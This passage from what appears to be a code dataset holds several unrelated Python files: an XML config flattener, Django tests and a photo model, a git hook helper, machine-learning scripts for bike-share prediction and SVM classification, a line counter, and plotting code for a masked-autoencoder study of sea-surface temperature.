Please check the output file: \" + new_xml_file + \"\\n\")\n\nsys.exit()\n#--------------------------------------------------\nprint(\"\\n===================================================================================\")\nprint(\"--- Phase 3: edit the new .xml so each immune cell type has its specific params (from the ORIGINAL .xml).\")\n\ntree_orig = ET.parse(\"PhysiCell_settings.xml\") \nxml_orig = tree_orig.getroot()\n\ntree_flat = ET.parse(\"new_flat_config2.xml\") \n# tree_flat = ET.parse(new_xml_file) \nxml_flat_root = tree_flat.getroot() # we'll update xml_flat_root (and write to a new output file)\n\ndef update_this_immune_cell_def_params(xmlpath, save_param_val, cell_def_name):\n# for cell_def in immune_cell_defs:\n for cd in xml_flat_root.findall('cell_definitions//cell_definition'): # find *this* cell_def in flattened XML\n if cd.attrib['name'] == cell_def_name:\n if len(xmlpath) > 13: # i.e., not equal to just \"//custom_data\" (with no param name)\n print('-- update ',cell_def_name, ', xmlpath=',xmlpath, \" = \",save_param_val)\n cd.find('.'+xmlpath).text = save_param_val\n\ndef recurse_node2(root,xmlpath, cell_def_name):\n global save_param_val\n xmlpath = xmlpath + \"//\" + root.tag[root.tag.rfind('}')+1:]\n param_val = ''\n for child in root:\n if child.text == None:\n print(\">>>> \", child, \".text is None\")\n continue\n param_val = ' '.join(child.text.split())\n if param_val != '':\n # print('param value=',param_val, ' for ',end='')\n save_param_val = param_val\n recurse_node2(child,xmlpath,cell_def_name)\n if len(list(root)) == 0:\n # print(xmlpath)\n print(xmlpath,' = ',save_param_val)\n update_this_immune_cell_def_params(xmlpath, save_param_val, cell_def_name)\n save_param_val = None\n\n\n#leaf_immune_cell_defs = [\"CD8 Tcell\", \"macrophage\", \"neutrophil\", \"DC\", \"CD4 Tcell\"]\nfor cd in xml_orig.findall('cell_definitions//cell_definition'):\n idx += 1\n if cd.attrib[\"name\"] in leaf_immune_cell_defs:\n uep = cd\n print(\"\\n---------------- processing \",cd.attrib[\"name\"]) # 2 (0=default, 1=lung epi)\n # immune_uep = root.find('.//cell_definitions')\n for child in cd:\n print(\"------- calling recurse_node2 on child=\",child)\n recurse_node2(child,\"\",cd.attrib[\"name\"])\n\nprint(\"\\nDone.\")\n\n#new_xml_file = \"new_flat_config3.xml\"\nnew_xml_file = \"flat.xml\"\ntree_flat.write(new_xml_file)\n\nwith open(new_xml_file, 'r+') as f:\n new_xml = f.read()\n f.seek(0, 0)\n f.write('' + '\\n' + new_xml)\n\nprint(\"---> wrote \",new_xml_file, \"(copy it to PhysiCell_settings.xml if desirable)\\n\")","sub_path":"qt_for_python/gui4xml/pyqt5_version/config_samples/flatten_cell_def_xml-huh.py","file_name":"flatten_cell_def_xml-huh.py","file_ext":"py","file_size_in_byte":11077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"215639281","text":"from django.test import TestCase, Client\n\nclass ViewTests(TestCase):\n \"\"\"\n Tests if the index page exists and returns 200\n \"\"\"\n def test_if_index_page_status_code_is_200(self):\n client = Client()\n response = client.get('/')\n\n self.assertEqual(response.status_code, 200)\n\n def test_if_categories_page_status_code_is_200(self):\n client = Client()\n response = client.get('/categories/');\n\n self.assertEqual(response.status_code, 200)\n \n","sub_path":"blog/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} 
+{"seq_id":"634325486","text":"#-*- coding:utf-8 -*-\nfrom os import system\nfrom sh import awk, grep, cat\n\ndef get_commit_files(file_type):\n system(\"git diff --cached --name-status > /tmp/git_hook\")\n\n files = awk(\n grep(\n cat(\"/tmp/git_hook\"), \"-P\", \"A|M.*.%s$\" % file_type,\n _ok_code = [0, 1]\n ), \"{print $2}\", _iter = True\n )\n\n exten = \".%s\" % file_type\n return [path[:path.rindex(exten) + len(exten)] for path in files]\n","sub_path":"common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"537755625","text":"import math\nimport numpy as np\nimport pandas as pd\nfrom sklearn.ensemble import GradientBoostingRegressor\nfrom sklearn.metrics import mean_squared_error\n\nif __name__ == '__main__':\n train_data = pd.read_csv('train.csv',skipinitialspace=1,index_col=0,parse_dates=True)\n test_data = pd.read_csv('test.csv',skipinitialspace=1,index_col=0,parse_dates=True)\n \n # adding year/month/day/hour as feature\n train_data['hour']=train_data.index.hour\n test_data['hour']=test_data.index.hour\n train_data['month']=train_data.index.month\n test_data['month']=test_data.index.month\n train_data['day']=train_data.index.day\n test_data['day']=test_data.index.day\n train_data['year']=train_data.index.year\n test_data['year']=test_data.index.year\n\n # add a column of time difference\n train_data['time'] = train_data.index\n test_data['time'] = test_data.index\n train_data['timeSince']=train_data.time-train_data.time[0]\n test_data['timeSince']=test_data.time-test_data.time[0]\n train_data['timeSince']=train_data['timeSince'].apply(lambda x: x / np.timedelta64(1,'D'))\n test_data['timeSince']=test_data['timeSince'].apply(lambda x: x / np.timedelta64(1,'D'))\n\n\n # transform target into log\n for col in ['casual', 'registered', 'count']:\n train_data['log-' + col] = train_data[col].apply(lambda x: math.log(1 + x))\n \n\n \n # selected column names\n selected_cols = [u'season', u'holiday', u'workingday', u'weather', u'temp', u'atemp',u'humidity', u'windspeed',u'hour',u'month',u'year',u'timeSince']\n \n params = {'n_estimators': 300, 'max_depth': 10, 'min_samples_split': 1,'learning_rate': 0.05, 'loss': 'ls'}\n\n clf_cas = GradientBoostingRegressor(**params)\n clf_reg = GradientBoostingRegressor(**params)\n\n clf_cas.fit(train_data[selected_cols], train_data['log-casual'])\n clf_reg.fit(train_data[selected_cols], train_data['log-registered'])\n \n train_data['prediction_cas'] = clf_cas.predict(train_data[selected_cols])\n train_data['prediction_reg'] = clf_reg.predict(train_data[selected_cols])\n train_data['prediction'] = train_data['prediction_cas'].apply(lambda x: math.exp(x)-1) + train_data['prediction_reg'].apply(lambda x: math.exp(x)-1)\n\n# round to closest integer\n train_data['prediction'].apply(round)\n train_data['prediction'].apply(lambda x: x if x>0 else 0)\n \n mse = mean_squared_error(train_data['count'], train_data['prediction'])\n print(\"MSE: %.4f\" % mse)\n \n test_data['prediction_cas'] = clf_cas.predict(test_data[selected_cols])\n test_data['prediction_reg'] = clf_reg.predict(test_data[selected_cols])\n test_data['prediction'] = test_data['prediction_cas'].apply(lambda x: math.exp(x)-1) + test_data['prediction_reg'].apply(lambda x: math.exp(x)-1)\n \n \n test_data['prediction'].apply(round)\n test_data['prediction'].apply(lambda x: x if x>0 else 0)\n \n test_data['prediction'].to_csv('output.csv',header=['count']) 
\n","sub_path":"source/github_wendykan_kaggle-bike-share-master/myGBR_2model_casualreg.py","file_name":"myGBR_2model_casualreg.py","file_ext":"py","file_size_in_byte":2864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"407100319","text":"\"\"\"Module contain photo model class and methods.\"\"\"\n\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db import models\n\nfrom checkpoint.models import Checkpoint\nfrom registration.models import CustomUser\nfrom trip.models import Trip\n\n\nclass Photo(models.Model):\n \"\"\"\n Photo\n :argument id: int - auto generated primary key\n :argument src: url - photo source link\n :argument user: - foreign key to User model\n :argument trip: - foreign key to Trip model\n :argument checkpoint: - foreign to Checkpoint model\n :argument description: str - description to photo\n :argument create_at: date - time when created\n :argument updated_at: date - time when updated.\n \"\"\"\n\n src = models.URLField()\n user = models.ForeignKey(CustomUser, null=True)\n trip = models.ForeignKey(Trip, null=True)\n checkpoint = models.ForeignKey(Checkpoint, null=True)\n title = models.TextField(null=True)\n description = models.TextField(null=True)\n create_at = models.DateTimeField(auto_now_add=True)\n update_at = models.DateTimeField(auto_now=True, editable=True)\n\n @staticmethod\n def get_by_id(photo_id):\n \"\"\"\n Get photo with given photo id\n Args:\n photo_id (int): photo id.\n Returns:\n Object: Object of Photo or None if got exception.\n \"\"\"\n try:\n return Photo.objects.get(id=photo_id)\n except ObjectDoesNotExist:\n return None\n\n @staticmethod\n def filter(trip_id, checkpoint_id):\n \"\"\"\n Get photo with given trip and checkpoint id\n Args:\n trip_id (int): trip id\n checkpoint_id (int): checkpoint id.\n trip_id (int): trip id.\n\n Returns:\n QuerySet: QuerySet of Photos.\n \"\"\"\n return Photo.objects.filter(trip_id=trip_id, checkpoint_id=checkpoint_id)\n\n @staticmethod\n def create(src, user, title=None, description=None, trip=None, checkpoint=None):\n \"\"\" Creating photo model, and returns created object\"\"\"\n photo = Photo()\n photo.src = src\n photo.trip = trip\n photo.checkpoint = checkpoint\n photo.user = user\n photo.title = title\n photo.description = description\n photo.save()\n return photo\n\n def update(self, title=None, description=None):\n \"\"\"Updating photo title and description.\"\"\"\n if title:\n self.title = title\n if description:\n self.description = description\n self.save()\n\n def to_dict(self):\n \"\"\"Convert model object to dictionary.\n Return:\n dict:\n {\n 'id': id,\n 'src': source link,\n 'user': user id,\n 'trip_id': trip id,\n 'checkpoint_id': checkpoint id,\n 'title': title text,\n 'description': description text,\n 'create_at': time when created,\n 'update_at': time when last updated,\n 'user_name': author's name,\n 'main_photo': True if this photo main trip image, else False\n }\n \"\"\"\n return {\n \"id\": self.id,\n \"src\": self.src,\n \"user\": self.user.id if self.user else None,\n \"trip_id\": self.trip.id if self.trip else None,\n \"checkpoint_id\": self.checkpoint.id if self.checkpoint else None,\n \"title\": self.title,\n \"description\": self.description,\n \"create_at\": self.create_at,\n \"update_at\": self.update_at,\n \"user_name\": (self.user.get_full_name() if self.user.get_full_name()\n else self.user.email),\n 'main_photo': True if self.trip.src == self.src else False,\n 
}\n","sub_path":"myTrip/photo/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"209338827","text":"import getopt, re, sys\nfrom svmutil import *\nfrom sklearn.metrics import confusion_matrix, recall_score\nimport numpy as np\nfrom sklearn.preprocessing import StandardScaler\nimport random\n\n\ndef getFeatures(data):\n features = data.split(\"\\n\")\n features = [feature.replace(\"\\n\", \"\") for feature in features]\n features.remove('')\n\n featuresInList = []\n for feature in features:\n featureList = feature.split(';')\n featureList = [float(inFeature) for inFeature in featureList]\n if (featureList != ['']):\n featuresInList.append(featureList)\n\n return featuresInList\n\n\ndef getLabels(data):\n labels = data.split(\"\\n\")\n labels.remove('')\n labels = [float(re.sub(\"[^0-9]\", \"\", label)) for label in labels]\n\n return labels\n\n\ndef separateDataIntoFolds(data, foldList):\n dataInFolds = [[] for i in range(len(set(foldList)))]\n loopIndex=0\n for foldIndex in foldList:\n dataInFolds[int(foldIndex)-1].append(data[loopIndex])\n loopIndex = loopIndex + 1\n\n return dataInFolds\n\n\ndef upSamplingDataSet(data, requiredLength):\n while(len(data) != requiredLength):\n if((requiredLength - len(data)) >= len(data)):\n for elem in data.copy():\n data.append(elem)\n else:\n dataCopy = data.copy()\n numberOfMissingData = requiredLength-len(data)\n indexArray = list(range(1, len(data)))\n random.shuffle(indexArray)\n for i in range(numberOfMissingData):\n data.append(dataCopy[i])\n\n return data\n\n\ndef main(argv):\n trainFileName = ''\n testFileName = ''\n testLabelFileName = ''\n inputTestFeatures = []\n inputTestLabels = []\n crossvalidationLabels = []\n isUpsamplingNeeded = False\n \n try:\n opts, args = getopt.getopt(argv,\"h:r:n:e:s:t:c:u\",[\"itrainlabelfile=\",\"itrainfile=\",\"itestlabelfile=\",\"itestfile=\",\"trainwithtest=\", \"crossvalidationfile=\", \"upsampling=\"])\n except getopt.GetoptError:\n print(getopt.GetoptError)\n print('startClass.py -n -r -s -e -t -c -u ')\n sys.exit(2)\n for opt, arg in opts:\n if opt == '-h':\n print('startClass.py --itrainlabelfile --itrainfile --itestlabelfile --itestfile --trainwithtest --crossvalidationfile --upsampling ')\n sys.exit()\n elif opt in (\"-r\", \"--itrainfile\"):\n trainFileName = arg\n file = open(trainFileName)\n data = file.read(1000000000)\n inputFeatures = getFeatures(data)\n elif opt in (\"-n\", \"--itrainlabelfile\"):\n trainLabelFileName = arg\n file = open(trainLabelFileName)\n data = file.read(1000000000)\n inputLabels = getLabels(data)\n elif opt in (\"-e\", \"--itestfile\"):\n testFileName = arg\n elif opt in (\"-s\", \"--itestlabelfile\"):\n testLabelFileName = arg\n elif opt in (\"-t\", \"--trainwithtest\"):\n file = open(testLabelFileName)\n data = file.read(1000000000)\n inputTestLabels = getLabels(data)\n print(\"read test file\")\n file = open(testFileName)\n data = file.read(1000000000)\n inputTestFeatures = getFeatures(data)\n elif opt in (\"-c\", \"--crossvalidationfile\"):\n crossvalidationFileName = arg\n file = open(crossvalidationFileName)\n data = file.read(1000000000)\n crossvalidationLabels = getLabels(data)\n elif opt in (\"-u\", \"--upsampling\"):\n isUpsamplingNeeded = True\n\n resultFile = open(\"../result/\" + str(trainFileName.split('\\\\')[-1]) + \"_pythonTrainResults.txt\", \"a+\")\n random.seed(42)\n\n trainDataInFolds = separateDataIntoFolds(inputFeatures, 
crossvalidationLabels)\n trainLabelInFolds = separateDataIntoFolds(inputLabels, crossvalidationLabels)\n\n preprocessedDataInFolds = [[] for i in range(len(trainDataInFolds))]\n preprocessedLabelInFolds = [[] for i in range(len(trainLabelInFolds))]\n\n preprocessedDataForTest = []\n preprocessedLabelForTest = []\n\n if(isUpsamplingNeeded):\n for i in range(len(trainDataInFolds)):\n dataFold = trainDataInFolds[i].copy()\n labelFold = trainLabelInFolds[i].copy()\n dataSeparatedByClass = [[] for index in range(len(set(labelFold)))]\n\n for j in range(len(labelFold)):\n dataSeparatedByClass[int(labelFold[j])-1].append(dataFold[j])\n #start upsampling\n largestClassSize = max(len(data) for data in dataSeparatedByClass)\n for k in range(len(dataSeparatedByClass)):\n dataByClass = upSamplingDataSet(dataSeparatedByClass[k].copy(), largestClassSize)\n #print(len(dataByClass))\n for sample in dataByClass:\n preprocessedDataInFolds[i].append(sample.copy())\n preprocessedLabelInFolds[i].append(k+1)\n\n if (len(inputTestFeatures) > 0):\n testDataSeparatedByClass = [[] for index in range(len(set(inputLabels)))]\n for j in range(len(inputLabels)):\n testDataSeparatedByClass[int(inputLabels[j])-1].append(inputFeatures[j])\n largestTestClassSize = max(len(data) for data in testDataSeparatedByClass)\n for k in range(len(testDataSeparatedByClass)):\n dataByClass = upSamplingDataSet(testDataSeparatedByClass[k].copy(), largestTestClassSize)\n for sample in dataByClass:\n preprocessedDataForTest.append(sample.copy())\n preprocessedLabelForTest.append(k + 1)\n\n else:\n preprocessedDataInFolds = trainDataInFolds\n preprocessedLabelInFolds = trainLabelInFolds\n preprocessedDataForTest = inputFeatures\n preprocessedLabelForTest = inputLabels\n\n resultFile.write('\\n' + trainFileName + '\\n') \n\n for i in range(-5,2):\n print(\"SVM complexity: \" + str(pow(10,i)))\n newParameters = '-b 1 -q -t 0 -c ' + str(pow(10,i))\n svmParameters = svm_parameter(newParameters)\n classSequence = []\n predictedPercentValues = [[] for i in range(len(inputLabels))]\n allPredictedLabel = []\n\n #start crossvalidation\n for crossvalidationRoundIndex in range(0,len(set(crossvalidationLabels))):\n print('calculate ' + str(crossvalidationRoundIndex) + ' of ' + str(len(set(crossvalidationLabels))-1) + ' folds crossvalidation')\n\n flatTestFold = preprocessedDataInFolds[crossvalidationRoundIndex].copy()\n flatTestLabelFold = preprocessedLabelInFolds[crossvalidationRoundIndex].copy()\n\n trainFold = preprocessedDataInFolds.copy()\n trainLabelFold = preprocessedLabelInFolds.copy()\n trainFold.remove(flatTestFold)\n trainLabelFold.remove(flatTestLabelFold)\n flatTrainFold = [item for sublist in trainFold for item in sublist]\n flatTrainLabelFold = [item for sublist in trainLabelFold for item in sublist]\n\n StandardScaler(copy=True, with_mean=True, with_std=True)\n standardizedFlatTrainData = StandardScaler().fit_transform(flatTrainFold)\n standardizedFlatTestData = StandardScaler().fit_transform(flatTestFold)\n\n problem = svm_problem(flatTrainLabelFold, standardizedFlatTrainData)\n modell = svm_train(problem, svmParameters)\n predictedLabels, predictedAccurancy, predictedVal = svm_predict(flatTestLabelFold, standardizedFlatTestData, modell, options='-b 1 -q')\n \n classSequence = modell.get_labels().copy()\n \n loopIndex = 0\n #test saples are chosen from the original train samples and after crossvalidation every test sample has percentages for every class so we want to collect them in the original sequence\n for testSample in 
flatTestFold:\n                sampleIndex = [k for k, x in enumerate(inputFeatures) if x == testSample]\n                for ind in sampleIndex:\n                    if crossvalidationLabels[ind] == crossvalidationRoundIndex+1:\n                        predictedPercentValues[ind] = predictedVal[loopIndex].copy()\n                loopIndex = loopIndex + 1\n\n        #end crossvalidation\n        for percentages in predictedPercentValues:\n            maximumPercentage = max(percentages)\n            allPredictedLabel.append(classSequence[percentages.index(maximumPercentage)])\n        \n        resultFile.write('\\n\\nSVM complexity: \\t' + str(pow(10,i)))\n        resultFile.write('\\nCross validation average UAR: \\t' + str(recall_score(inputLabels, allPredictedLabel, average='macro')))\n        confusionMatrix = confusion_matrix(inputLabels, allPredictedLabel)\n\n        if(len(inputTestFeatures) > 0):\n            print(\"start test\")\n            problem = svm_problem(preprocessedLabelForTest, preprocessedDataForTest)\n            modell = svm_train(problem, svmParameters)\n            testPredictedLabels, testPredictedAccurancy, testPredictedVal = svm_predict(inputTestLabels, inputTestFeatures, modell, options='-b 1 -q')\n            testUAR = recall_score(inputTestLabels, testPredictedLabels, average='macro')\n            resultFile.write('\\ntest database UAR: \\t' + str(testUAR))\n\n        resultFile.flush()\n    \n    resultFile.close()\n\n\nif __name__ == \"__main__\":\n    main(sys.argv[1:])\n","sub_path":"python/startClass.py","file_name":"startClass.py","file_ext":"py","file_size_in_byte":9734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"536950594","text":"#!/usr/bin/env python\n__author__ = 'Albino'\n\n\"\"\"\nGiven a directory of programs you have written, count how many lines of code you wrote. Include blank lines and comments, but list them separately.\n\"\"\"\n\nimport os\n\n\ndef walk_dir(path):\n    file_path = []\n    for root, dirs, files in os.walk(path):\n        for file in files:\n            if file.lower().endswith(\".py\"):\n                file_path.append(os.path.join(path, file))\n    return file_path\n\n\ndef count_the_code(path):\n    file_name = os.path.basename(path)\n    code_num = 0\n    blank_num = 0\n    note_num = 0\n    flag = False\n    with open(path, mode='r', encoding='utf-8') as f:\n        lines = f.read().split('\\n')\n        for line in lines:\n            code_num += 1\n            stripped = line.strip()\n            if stripped.startswith('\"\"\"') and not flag:\n                note_num += 1\n                # a docstring that opens and closes on the same line must not leave the flag set\n                if not (stripped.endswith('\"\"\"') and len(stripped) >= 6):\n                    flag = True\n                continue\n            if stripped.startswith('\"\"\"'):\n                note_num += 1\n                flag = False\n            if stripped.startswith('#') or flag:\n                note_num += 1\n            if len(line) == 0:\n                blank_num += 1\n    print(\"In %s there are %s lines in total, of which %s are blank and %s are comments\" % (file_name, code_num, blank_num, note_num))\n\n\nif __name__ == '__main__':\n    for code_path in walk_dir(\".\"):\n        count_the_code(code_path)\n","sub_path":"007/007.py","file_name":"007.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"219665645","text":"from dataclasses import replace\nfrom datetime import datetime\nimport os, sys, requests\nimport numpy as np\nimport scipy\nfrom scipy import stats\nfrom urllib.parse import urlparse\nimport datetime\n\nimport argparse\n\nimport healpy as hp\n\nimport matplotlib as mpl\nimport matplotlib.gridspec as gridspec\nfrom matplotlib import pyplot as plt\nfrom matplotlib.patches import Rectangle, Ellipse\nfrom scipy.optimize import curve_fit\n\nfrom cartopy.mpl.gridliner import LONGITUDE_FORMATTER, LATITUDE_FORMATTER\n\nmpl.rcParams['font.family'] = 'stixgeneral'\n\nimport pandas as pd\nimport seaborn as sns\nfrom matplotlib import ticker\nimport h5py\n\nfrom ulmo import plotting\nfrom ulmo.utils import utils as utils\nfrom ulmo import io as ulmo_io\nfrom ulmo.ssl import single_image as 
ssl_simage\nfrom ulmo.ssl import defs as ssl_defs\nfrom ulmo.mae import patch_analysis\ntry:\n from ulmo.mae import models_mae\nexcept ModuleNotFoundError:\n print(\"Could not import models_mae\")\nfrom ulmo.utils import image_utils\n\n\nimport requests\n\nimport torch\n\nfrom PIL import Image\nfrom ulmo.plotting import plotting\n\nfrom IPython import embed\n\n\n\n##############################################################\n# ------------- Generate Cloud Coverage Plot------------------\n##############################################################\ndef fig_cloud_coverage(filepath='data/modis_2020_cloudcover.npz', \n outfile='cloud_coverage.png'):\n\n #filepath = 'data/modis_2020_cloudcover.npz'\n\n data = np.load(filepath)\n lst = data.files\n x = data['CC_values']\n y = data['tot_pix_CC']\n\n from scipy.interpolate import make_interp_spline, BSpline\n # 300 represents number of points to make between T.min and T.max\n xnew = np.linspace(np.min(x), np.max(x), 300)\n\n spl = make_interp_spline(x, y, k=3) # type: BSpline\n power_smooth = spl(xnew)\n sns.set_style(\"whitegrid\")\n sns.set_context(\"paper\")\n\n f, ax = plt.subplots(figsize=(8, 7))\n #ax.set_axisbelow(True)\n #ax.grid(color='gray', linestyle='dashed', linewidth = 0.5)\n\n sns.lineplot(x=xnew, y=power_smooth, color='blue', linewidth=2.5)\n \n ax.set_yscale(\"log\")\n #plt.plot(xnew, power_smooth)\n ax.set_xlim(0,1)\n ax.set_ylim(10**7,10**11)\n #ax.xaxis.set_ticks(np.arange(0, 1, 0.1))\n ax.set_xlabel('Fraction of Clouds in Cutout (CC)')\n ax.set_ylabel(f'Cutouts Available ($N_c$)')\n #ax.set_title(\"Cutouts vs Cloud Coverage\")\n\n #sns.set(rc={\"xtick.bottom\" : True, \"ytick.left\" : True})\n #ax.tick_params(which=\"both\", bottom=True)\n ax.tick_params(axis='y', which='both', direction='out', length=4, left=True,\n color='gray')\n ax.grid(True, which='both', color='gray', linewidth=0.1)\n ax.minorticks_on()\n\n\n\n plotting.set_fontsize(ax, 15)\n\n plt.savefig(outfile, dpi=300)\n plt.close()\n print(f'Wrote: {outfile}')\n\n\n##############################################################\n# --------- Generate Encoder, Decoder, and Recon ------------\n##############################################################\n\"\"\"\nFor single image reconstructions.\n\"\"\"\ndef prepare_model(chkpt_dir, arch='mae_vit_LLC_patch4'):\n # build model\n model = getattr(models_mae, arch)()\n # load model\n checkpoint = torch.load(chkpt_dir, map_location='cpu')\n msg = model.load_state_dict(checkpoint['model'], strict=False)\n print(msg)\n return model\n\ndef run_one_image(img, model, mask_ratio):\n x = torch.tensor(img)\n\n # make it a batch-like\n x = x.unsqueeze(dim=0)\n x = torch.einsum('nhwc->nchw', x)\n\n # run MAE\n loss, y, mask = model(x.float(), mask_ratio)\n y = model.unpatchify(y)\n y = torch.einsum('nchw->nhwc', y).detach().cpu()\n\n # visualize the mask\n mask = mask.detach()\n mask = mask.unsqueeze(-1).repeat(1, 1, model.patch_embed.patch_size[0]**2 *1) # (N, H*W, p*p*3)\n mask = model.unpatchify(mask) # 1 is removing, 0 is keeping\n mask = torch.einsum('nchw->nhwc', mask).detach().cpu()\n \n x = torch.einsum('nchw->nhwc', x)\n\n # masked image\n im_masked = x * (1 - mask)\n\n # MAE reconstruction pasted with visible patches\n im_paste = x * (1 - mask) + y * mask\n \n im = im_paste.cpu().detach().numpy()\n m = mask.cpu().detach().numpy()\n re = y.cpu().detach().numpy()\n im = im.squeeze()\n m = m.squeeze()\n re = re.squeeze()\n print('reconstruction complete')\n \n return im, m, re\n\ndef plot_encoder_decoder(orig_img, 
recon_img, recon_full, mask_img, idx,\n apply_bias=False, vmnx = [None, None],\n LL_file='MAE_LLC_valid_nonoise.parquet'):\n \"\"\"\n Plots the:\n 1) Original image\n 2) Masked image\n 3) Encoder Results\n 4) Decoder Results\n 5) Reconstructed Image\n \"\"\"\n # Load Unmasked\n unmasked = 1 - mask_img\n\n # Bias\n diff_true = recon_img - orig_img\n bias = np.median(diff_true[np.abs(diff_true)>0.])\n\n # Find the patches\n p_sz = 4\n patches = patch_analysis.find_patches(mask_img, p_sz)\n upatches = patch_analysis.find_patches(unmasked, p_sz)\n\n\n fig = plt.figure(figsize=(13, 4))\n plt.clf()\n gs = gridspec.GridSpec(1,5)\n ax0 = plt.subplot(gs[0])\n\n _, cm = plotting.load_palette()\n cbar_kws={'label': 'SSTa (K)',\n 'fraction': 0.0450,\n 'location': 'top'}\n\n _ = sns.heatmap(np.flipud(orig_img), xticklabels=[],\n vmin=vmnx[0], vmax=vmnx[1],\n yticklabels=[], cmap=cm, cbar=True, \n square=True, \n cbar_kws=cbar_kws,\n ax=ax0)\n\n # Reconstructed\n sub_recon = np.ones_like(recon_img) * np.nan\n # Difference\n diff = np.ones_like(recon_img) * np.nan\n frecon = recon_img.copy()\n\n # Reconstructed\n usub_recon = np.ones_like(recon_img) * np.nan\n # Difference\n udiff = np.ones_like(recon_img) * np.nan\n ufrecon = recon_img.copy()\n\n # Plot/fill the patches for masked image\n for kk, patch in enumerate(upatches):\n i, j = np.unravel_index(patch, unmasked.shape)\n # Fill\n usub_recon[i:i+p_sz, j:j+p_sz] = orig_img[i:i+p_sz, j:j+p_sz]\n ufrecon[i:i+p_sz, j:j+p_sz]\n # ???\n udiff[i:i+p_sz, j:j+p_sz] = diff_true[i:i+p_sz, j:j+p_sz]\n\n # Unmasked image\n ax1 = plt.subplot(gs[1])\n\n u_recon = False\n if u_recon:\n usub_recon = ufrecon.copy()\n _ = sns.heatmap(np.flipud(usub_recon), xticklabels=[],\n vmin=vmnx[0], vmax=vmnx[1],\n yticklabels=[], cmap=cm, cbar=True, \n square=True, cbar_kws=cbar_kws,\n ax=ax1)\n\n \n # Plot/fill the patches for latent vector\n for kk, patch in enumerate(upatches):\n i, j = np.unravel_index(patch, unmasked.shape)\n # Fill\n usub_recon[i:i+p_sz, j:j+p_sz] = recon_full[i:i+p_sz, j:j+p_sz]\n ufrecon[i:i+p_sz, j:j+p_sz]\n # ???\n udiff[i:i+p_sz, j:j+p_sz] = diff_true[i:i+p_sz, j:j+p_sz]\n \n # Unmasked image\n ax2 = plt.subplot(gs[2])\n\n u_recon = False\n if u_recon:\n usub_recon = ufrecon.copy()\n _ = sns.heatmap(np.flipud(usub_recon), xticklabels=[],\n vmin=vmnx[0], vmax=vmnx[1],\n yticklabels=[], cmap=cm, cbar=True, \n square=True, cbar_kws=cbar_kws,\n ax=ax2)\n \n # Full Recon image\n ax3 = plt.subplot(gs[3])\n\n full_recon = True\n if apply_bias:\n cbar_kws['label'] = 'SSTa (K) ({:.3f} bias)'.format(bias)\n if full_recon:\n sub_recon = frecon.copy()\n _ = sns.heatmap(np.flipud(recon_full), xticklabels=[],\n vmin=vmnx[0], vmax=vmnx[1],\n yticklabels=[], cmap=cm, cbar=True, \n square=True, cbar_kws=cbar_kws,\n ax=ax3)\n\n # Recon image\n ax4 = plt.subplot(gs[4])\n\n full_recon = True\n if apply_bias:\n cbar_kws['label'] = 'SSTa (K) ({:.3f} bias)'.format(bias)\n if full_recon:\n sub_recon = frecon.copy()\n _ = sns.heatmap(np.flipud(sub_recon), xticklabels=[],\n vmin=vmnx[0], vmax=vmnx[1],\n yticklabels=[], cmap=cm, cbar=True, \n square=True, cbar_kws=cbar_kws,\n ax=ax4)\n\n # Borders\n # \n for ax, title in zip( [ax0, ax1, ax2 ,ax3, ax4],\n ['Original', 'Masked', 'Latent Representation', 'Decoder Results', 'Original + Reconstructed']):\n ax.patch.set_edgecolor('black') \n ax.patch.set_linewidth(1.) 
\n #\n show_title=True\n if show_title:\n ax.set_title(title, fontsize=16, y=-0.14)\n \n # Plot title\n table = pd.read_parquet(LL_file, engine='pyarrow',columns=['pp_idx', 'LL'])\n table = table[table['LL'].notna()]\n table = table.sort_values(by=['pp_idx'])\n LL = int(table.iloc[idx]['LL'])\n #fig.suptitle('{LL} LL Reconstruction: t{model} {p}% masking'.format(LL=LL))\n fig.suptitle('{LL} LL Reconstruction'.format(LL=LL))\n \n plt.tight_layout(pad=0.5, h_pad=0.5, w_pad=0.5)\n outfile = 'training_visual.png'\n plt.savefig(outfile, dpi=300)\n plt.close()\n print('Wrote {:s}'.format(outfile))\n\ndef figs_training(idx=85674, \n filepath=os.path.join(os.getenv('OS_OGCM'),\n 'LLC', 'Enki', 'PreProc', \n 'MAE_LLC_valid_nonoise_preproc.h5'), \n model_filepath=os.path.join(os.getenv('OS_OGCM'),\n 'LLC', 'Enki', 'Models',\n 'Enki_t75.pth'),\n table = 'data/MAE_LLC_valid_nonoise.parquet'):\n \"\"\"\n Create fig\n \"\"\"\n # load image and model\n f = h5py.File(filepath, 'r')\n img = f['valid'][idx][0]\n img.resize((64,64,1))\n model = prepare_model(model_filepath, 'mae_vit_LLC_patch4')\n print('Model75 loaded.')\n \n # Reconstruct\n recon_img, mask, full_recon = run_one_image(img, model, 0.75)\n orig_img = img.squeeze()\n \n plot_encoder_decoder(orig_img, recon_img, full_recon, mask, idx, apply_bias=False, vmnx = [-1.8, 1.8], \n LL_file=table)\n\n return\n\n##############################################################\n# --------------- Generate Interesting Recons ----------------\n##############################################################\ndef plot_recon(orig_img, recon_img, mask_img, idx,\n apply_bias=False, vmnx = [None, None, None, None],\n outfile='recon.png',\n LL_file = os.path.join(os.getenv('OS_OGCM'),\n 'LLC', 'Enki', 'Tables', \n 'MAE_LLC_valid_nonoise.parquet')):\n \"\"\"\n Plots the:\n 1) Original Image\n 2) Masked Image\n 3) Reconstructed Image\n 4) Residuals\n \"\"\"\n # Load Unmasked\n unmasked = 1 - mask_img\n\n # Bias\n embed(header='This is an offset, not a bias. 
